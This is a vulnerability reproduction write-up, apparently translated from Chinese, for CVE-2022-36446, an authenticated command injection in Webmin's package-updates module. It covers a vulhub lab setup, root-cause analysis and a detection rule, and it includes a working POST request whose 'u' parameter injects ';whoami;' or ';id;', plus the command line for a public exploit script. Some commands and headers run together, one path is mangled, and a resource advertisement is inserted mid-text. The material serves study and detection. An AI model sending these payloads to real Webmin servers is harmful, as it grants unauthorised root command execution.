Network Security Command Execution Vulnerability Reappearance

0x01 Vulnerability Introduction

Vulnerability Level: Critical

Webmin is the most powerful web-based Unix system administration tool. The administrator accesses various management functions of Webmin through a browser and completes corresponding management actions. There is an arbitrary command injection vulnerability in Webmin before version 1.997, triggering this vulnerability requires logging into Webmin.

0x02 Vulnerability scope

WebMin version less than 1.997

0x03 exploit conditions

• This vulnerability requires authentication;

• And the account must have permission to access the software package update module, and access to the "Software Package Updates" module is required to trigger the vulnerability;

0x04 Vulnerability Reappearance

Environment build

1. Use vulhub to build the environment, and download vulhub to the local.

2. Enter vulhub/webmin/CVE0=-2019-15107, and use this environment to reproduce the CVE-2022-36446 vulnerability.

docker-compose up -d   #  启动漏洞环境docker-compose ps      # 查看漏洞环境映射的端口

copy code

【Help safe learning one by one, get all resources one by one】

①Network security learning route

②20 penetration testing e-books

③Security offense and defense 357 pages of notes

④50 security offensive and defensive interview guides

⑤Security Red Team Penetration Toolkit

⑥ Necessary Books on Network Security

⑦100 actual combat cases of vulnerabilities

⑧Internal tutorials of security giants

3. Access https://ip:10000, the following interface appears, indicating that the environment deployment is successful.

4. Next, you need to modify the password of webmin, and you need to enter the container to modify it.

docker ps     # 查看漏洞环境容器iddocker exec -it 容器id /bin/bash    # 进入容器内部cd /usr/share/webmin/                     # 进入容器内的/usr/share/webmin/目录下./changepass.pl /etc/webmin root root   # 将root密码设置为root

copy code

Vulnerability recurrence

1. After the above settings are completed, use root/root to log in to webmin.

2. Capture any data packets after login.

3. Send to the Repeater module, and change the request method to POST.

4. Change the request path to /package-updates/update.cgi, add payload, send the request, and return the command execution result in the package.

mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow

copy code

POST /package-updates/update.cgi HTTP/1.1Host: X.X.X.X:10000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-From: mountX-Requested-From-Tab: webminX-Requested-With: XMLHttpRequestConnection: closeReferer: https://X.X.X.X:10000/mount/?xnavigation=1Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originContent-Type: application/x-www-form-urlencodedContent-Length: 71
mode=new&search=ssh&redir=&redirdesc=&u=0%3Bid%3B&confirm=Install%2BNow

copy code

EXP

Vulnerabilities can also be exploited directly through scripts, EXP address: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE .

python3 CVE-2022-36446.py -t https://X.X.X.X:10000/ -u root -p root -k -I

copy code

The following errors may occur

Change all CVE-2022-36446.pyin the file soup = BeautifulSoup(r.content, 'lxml')to soup = BeautifulSoup(r.content, 'html.parser'), and execute again.

Vulnerability analysis

Command execution **:**

When the application needs to call an external program to process some content, it will use some functions to execute system commands, such as the most common system, exec, shell_exec and so on in php. When the user can control the parameters in the command execution function, some malicious system commands can be injected into normal commands, causing command execution attacks.

Webmin is currently the most powerful web-based Unix system management tool. Administrators access various management functions of webmin through a browser and complete corresponding management actions.

Webmin uses the operating system package manager (apt, yum, etc.) to perform package updates and installations. Due to the lack of input sanitization (software/apt-lib.pl in Webmin prior to 1.997 lacks HTML escaping for UI commands), it is possible to inject arbitrary commands that will connect to package manager calls.

This vulnerability requires authentication , and the account must have permission to access the package update module . Users can execute system commands during the installation of new packages and run commands with root privileges.

The module is developed under the /package-updates/ folder. There is an update.cgi file that specifies the user's package name with the parameter U on line 39, and checks for the presence of the "confirm" parameter in the request on line 50. On line 57, if there is no "confirm" parameter in the request, the "list_package_operations()" function is called with the variable "pkgnames", where the package names are stored.

You can tell from /package-updates/update.cgiline 4 of the file that “list_package_operations”the function is “pakage-updates-lib.pl”in the file.

“list_package_operations()”The function is defined on pakage-updates-lib.plline 408 of the file. This function sends the value of "$name", which is the package name, to “update_system_operations()”the function in the file named software on line 412.

Then use the search function to find update_system_operations()the files defining the functions as apt-lib.pl and yum-lib.pl.

As the names suggest, the apt-lib.pl file uses the apt package, and the yum-lib.pl file uses the yum package. The work done by the two is the same, but because the system running Webmin and the package manager of the system are different, only some commands in the file will be different, so any file can be analyzed

Looking at /software/apt-lib.plthe file, the function is defined on line 75 update_system_operations(). Line 83 “backquote_command()”executes the system commands through the function, and also uses this function to control the security of the commands run by the system, and also prevents users from injecting commands here.

Continue to look at the update.cgi file. If a package needs to be installed, the "package_install()" function on line 129 will be called.

By searching, the package_install() function is located at line 300 in the "package-updates-lib.pl" file. Looking at the function content, it is found that the "update_system_install()" function is called through the "$name" variable, which is the package name given by the user on line 345 (from the previous analysis, these functions are in apt-lib.pl defined in the file).

Check the apt-lib.pl file again to find related functions.

Line 18 sees the function's first argument (which is the package name the user sent earlier) assigned to the "update" variable. On line 26, the "update" variable is included in the command without any control mechanism. Line 46 found that the relevant commands will be executed directly on the system without any control mechanism.

So, a user can execute commands on a system with root privileges by providing the "confirm" parameter in a new package install request and specifying in the package a value to run the command on the system.

0x05 Detect POC rule writing

params:- mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNowname: Webmin命令执行漏洞（CVE-2022-36446）set: {}rules:- method: POST  path: /package-updates/update.cgi  headers:    Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6  body: mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow  search: ""  followredirects: false  expression: response.status == 200 && response.body.bcontains(b"root")groups: {}detail:  author: ""  links: []  description: ""  version: ""

copy code

0x06 bug fix

1. Upgrade to version 1.997 and above 2. Patch acquisition